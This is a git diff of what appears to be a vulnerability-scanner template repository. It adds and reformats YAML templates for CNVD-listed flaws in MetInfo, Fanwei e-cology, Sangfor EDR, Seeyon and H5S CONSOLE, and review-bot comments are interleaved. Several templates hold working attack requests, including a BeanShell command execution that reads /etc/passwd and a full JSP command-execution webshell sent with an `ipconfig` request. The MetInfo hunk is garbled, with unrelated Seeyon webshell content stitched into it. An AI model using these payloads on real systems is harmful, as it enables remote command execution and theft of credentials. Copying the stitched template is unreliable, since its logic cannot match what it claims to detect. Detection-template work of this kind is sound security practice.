| | +| cobub | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| unisharp | 1 | | | | | | | | | +| zoneminder | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| alchemy | 
1 | | | | | | | | | +| eyoumail | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| oki | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| raspberrymatic | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| ubnt | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| version | 1 | | | | | | | | | +| markdown | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| incapptic-connect | 1 | | | | | | | | | +| hetzner | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| books | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| groupoffice | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| h5sconsole | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| ldap | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| clansphere | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| oliver | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| feedwordpress | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| privx | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| dokuwiki | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| 
twitter-server | 1 | | | | | | | | | +| recon | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| librenms | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| extreme | 1 | | | | | | | | | +| vision | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| web3storage | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| buildbot | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| coinmarketcap | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| idor | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| securepoint | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| express | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| secnet-ac | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | 
| +| wpqa | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| pyspider | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| avada | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| dicoogle | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| suprema | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| fatwire | 1 | | | | | | | | | +| admin | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| etcd | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | | jsp | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| scs | 1 | | 
| | | | | | | +| solarview | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| musicstore | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| trello | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| console | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| webalizer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| flask | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| iconfinder | 1 | | | | | | | | | +| hirak | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| spinnaker | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| supervisor | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| webmail | 1 | | 
| | | | | | | +| polarisft | 1 | | | | | | | | | +| eyoucms | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| containers | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| secret | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| leostream | 1 | | | | | | | | | +| guppy | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| gateway | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| blockchain | 1 | | | | | | 
| | | +| wavemaker | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| vms | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| sourcecodester | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| jspxcms | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| txt | 1 | | | | | | | | | +| sassy | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| unifi | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| yarn | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| cassandra | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| neo4j | 1 | | | | | | | | | +| veeam | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| prototype | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| revslider | 1 | | | | | 
| | | | +| h2 | 1 | | | | | | | | | +| aerohive | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| newsletter | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| sucuri | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| chaos | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| ucs | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| connect-central | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| h3c | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| activeadmin | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| jwt | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| projectdiscovery | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| droneci | 1 | | | | | | | | | +| concourse | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 389da75091..be73077a0e 100644 
--- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | +| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 | +| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 | +| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 | +| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 | +| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | | +| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | | +| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | | +| tech | 272 | gy741 | 119 | default-logins | 96 | | | | | +| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | | diff --git a/cnvd/2018/CNVD-2018-13393.yaml b/cnvd/2018/CNVD-2018-13393.yaml new file mode 100644 index 0000000000..0cce50c757 --- /dev/null +++ b/cnvd/2018/CNVD-2018-13393.yaml 
@@ -0,0 +1,25 @@ +id: CNVD-2018-13393 + +info: + name: Metinfo LFI + author: ritikchaddha + severity: high + reference: + - https://paper.seebug.org/676/ + tags: metinfo,cnvd,cvnd2018,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("
" +excuteCmd(request.getParameter("{{randstr}}")) + "
");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce + + - | + GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_1, "htmoffice operate")' + - 'contains(body_2, "Windows IP")' + condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2019/CNVD-2019-32204.yaml b/cnvd/2019/CNVD-2019-32204.yaml new file mode 100644 index 0000000000..ec365a5f8c --- /dev/null +++ b/cnvd/2019/CNVD-2019-32204.yaml @@ -0,0 +1,30 @@ +id: CNVD-2019-32204 + +info: + name: Fanwei e-cology <=9.0 - Remote Code Execution + author: daffainfo + severity: critical + description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. + reference: + - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: fanwei,cnvd,cnvd2019,rce + +requests: + - raw: + - | + POST /bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2020-23735.yaml b/cnvd/2020/CNVD-2020-23735.yaml similarity index 83% rename from cnvd/CNVD-2020-23735.yaml rename to cnvd/2020/CNVD-2020-23735.yaml index 88cf7d0df7..2a5823431c 100644 --- a/cnvd/CNVD-2020-23735.yaml +++ b/cnvd/2020/CNVD-2020-23735.yaml 
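Review bot: The `tags` line of the CNVD-2018-13393 template spells the year tag `cvnd2018`, while every other template in this change uses `cnvd2019`/`cnvd2020`/`cnvd2021`; the typo already shows up as its own `cvnd2018 | 1` row in TEMPLATES-STATS.md, so a `-tags cnvd2018` run would skip this template — change it to `tags: metinfo,cnvd,cnvd2018,lfi`. Separately, the matcher block as rendered here contains a JSP command-execution string and a `GET /seeyon/test123456.jsp` request that have nothing to do with MetInfo's `login_check.php`; this looks like a display/merge artefact rather than the committed file, so the matcher logic cannot be reviewed from this page and should be checked against the raw file. If that content really is in the file, the template can never match a MetInfo target and the hunk's stated 25 lines would not add up.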
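Review bot: The BeanShell probe `bsh.script=exec("cat+/etc/passwd");` only proves the issue on Unix-like hosts and reads a sensitive system file; e-cology is often deployed on Windows, where the `root:.*:0:0:` regex can never match and the template reports nothing against a fully exploitable server. A platform-neutral, non-intrusive probe such as `bsh.script=print(7*191);` matched with a `word` matcher on `1337` detects the unauthenticated script evaluation itself regardless of OS and leaves no file access in the target's audit trail. Keep `bsh.servlet.output=raw` so the marker comes back unwrapped, and consider a comment in the template noting that the servlet evaluates arbitrary BeanShell without authentication.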
@@ -5,8 +5,9 @@ info: author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. - reference: https://www.cnvd.org.cn/flaw/show/2025171 - tags: xunchi,lfi,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/2025171 + tags: xunchi,lfi,cnvd,cnvd2020 requests: - method: GET @@ -18,9 +19,10 @@ requests: - type: status status: - 200 + - type: word + part: body words: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" - part: body - condition: and \ No newline at end of file + condition: and diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml new file mode 100644 index 0000000000..02a98ac205 --- /dev/null +++ b/cnvd/2020/CNVD-2020-46552.yaml @@ -0,0 +1,33 @@ +id: CNVD-2020-46552 + +info: + name: Sangfor EDR - Remote Code Execution + author: ritikchaddha + severity: critical + description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host. + reference: + - https://www.modb.pro/db/144475 + - https://blog.csdn.net/bigblue00/article/details/108434009 + - https://cn-sec.com/archives/721509.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-77 + tags: cnvd,cnvd2020,sangfor,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php" + + matchers: + - type: dsl + dsl: + - 'contains(body, "$show_input = function($info)")' + - 'contains(body, "$strip_slashes($host)")' + - 'contains(body, "Log Helper")' + - 'status_code == 200' + condition: and + +# Enhanced by mp on 2022/05/18 
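Review bot: `cve-id:` in the Sangfor EDR template's `classification` block is left with no value, which YAML parses as null rather than an empty string; since this CNVD entry has no CVE the line should simply be dropped, keeping `cwe-id: CWE-77` and the CVSS fields. The probe itself is well chosen: `strip_slashes=printf&host=nl+c.php` makes the injected callable `$strip_slashes($host)` dump the numbered source of `c.php` instead of running a shell command, so matching on `$show_input = function($info)` confirms the vulnerable code path without touching the host. A one-line comment above `matchers:` saying so (`# non-intrusive: the callable injection prints c.php's own source, no shell command is run`) would help triagers understand why an RCE template only expects PHP source text back.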
diff --git a/cnvd/CNVD-2020-56167.yaml b/cnvd/2020/CNVD-2020-56167.yaml similarity index 83% rename from cnvd/CNVD-2020-56167.yaml rename to cnvd/2020/CNVD-2020-56167.yaml index 1fe06f6c1c..964ed36f40 100644 --- a/cnvd/CNVD-2020-56167.yaml +++ b/cnvd/2020/CNVD-2020-56167.yaml @@ -4,8 +4,9 @@ info: name: Ruijie Smartweb Default Password author: pikpikcu severity: low - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - tags: ruijie,default-login,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 + tags: ruijie,default-login,cnvd,cnvd2020 requests: - method: POST @@ -17,12 +18,11 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - "Level was: LEVEL15" - "/WEB_VMS/LEVEL15/" - part: body condition: and - type: status diff --git a/cnvd/CNVD-2020-62422.yaml b/cnvd/2020/CNVD-2020-62422.yaml similarity index 75% rename from cnvd/CNVD-2020-62422.yaml rename to cnvd/2020/CNVD-2020-62422.yaml index 736770f82c..0194c6d8b8 100644 --- a/cnvd/CNVD-2020-62422.yaml +++ b/cnvd/2020/CNVD-2020-62422.yaml @@ -1,11 +1,12 @@ id: CNVD-2020-62422 info: - name: Seeyon readfile(CNVD-2020-62422) + name: Seeyon - Arbitrary File Retrieval author: pikpikcu severity: medium - reference: https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi,cnvd + reference: + - https://blog.csdn.net/m0_46257936/article/details/113150699 + tags: lfi,cnvd,cnvd2020,seeyon requests: - method: GET @@ -17,13 +18,15 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/x-msdownload" condition: and - part: header + - type: word + part: body words: - "ctpDataSource.password" condition: and - part: body \ No newline at end of file diff --git a/cnvd/2020/CNVD-2020-67113.yaml b/cnvd/2020/CNVD-2020-67113.yaml new file mode 100644 index 0000000000..547b8d305b --- /dev/null +++ b/cnvd/2020/CNVD-2020-67113.yaml 
@@ -0,0 +1,44 @@ +id: CNVD-2020-67113 + +info: + name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113) + author: ritikchaddha + severity: high + description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability + reference: + - https://vul.wangan.com/a/CNVD-2020-67113 + metadata: + shodan-query: http.title:"H5S CONSOLE" + tags: h5s,unauth,h5sconsole,cnvd,cnvd2020 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/GetSrc" + - "{{BaseURL}}/api/v1/GetDevice" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'strUser' + - 'strPasswd' + condition: and + + - type: word + part: body + words: + - 'H5_AUTO' + - 'H5_DEV' + condition: or + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 diff --git a/cnvd/CNVD-2020-68596.yaml b/cnvd/2020/CNVD-2020-68596.yaml similarity index 59% rename from cnvd/CNVD-2020-68596.yaml rename to cnvd/2020/CNVD-2020-68596.yaml index 56cd6901fd..b1d96de058 100644 --- a/cnvd/CNVD-2020-68596.yaml +++ b/cnvd/2020/CNVD-2020-68596.yaml @@ -1,11 +1,17 @@ id: CNVD-2020-68596 info: - name: WeiPHP 5.0 Path Traversal + name: WeiPHP 5.0 - Path Traversal author: pikpikcu - severity: critical - reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html - tags: weiphp,lfi,cnvd + description: WeiPHP 5.0 is susceptible to directory traversal attacks. + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: weiphp,lfi,cnvd,cnvd2020 requests: - raw: 
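Review bot: The `description` of the H5S CONSOLE template is a sentence fragment ("… Exists Unauthorized Access Vulnerability") and does not say what the unauthenticated endpoints return, although the matcher itself requires `strUser` and `strPasswd` in the body, i.e. stored source/device credentials. Suggest `description: H5S CONSOLE (Zero Vision Technology (Shanghai) Co., Ltd.) serves /api/v1/GetSrc and /api/v1/GetDevice without authentication, returning configured sources and devices together with their stored usernames and passwords.` Because the response carries credentials, it is the right call that the template has no extractor; a short comment noting that the values are intentionally not extracted would stop a later contributor from adding one.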
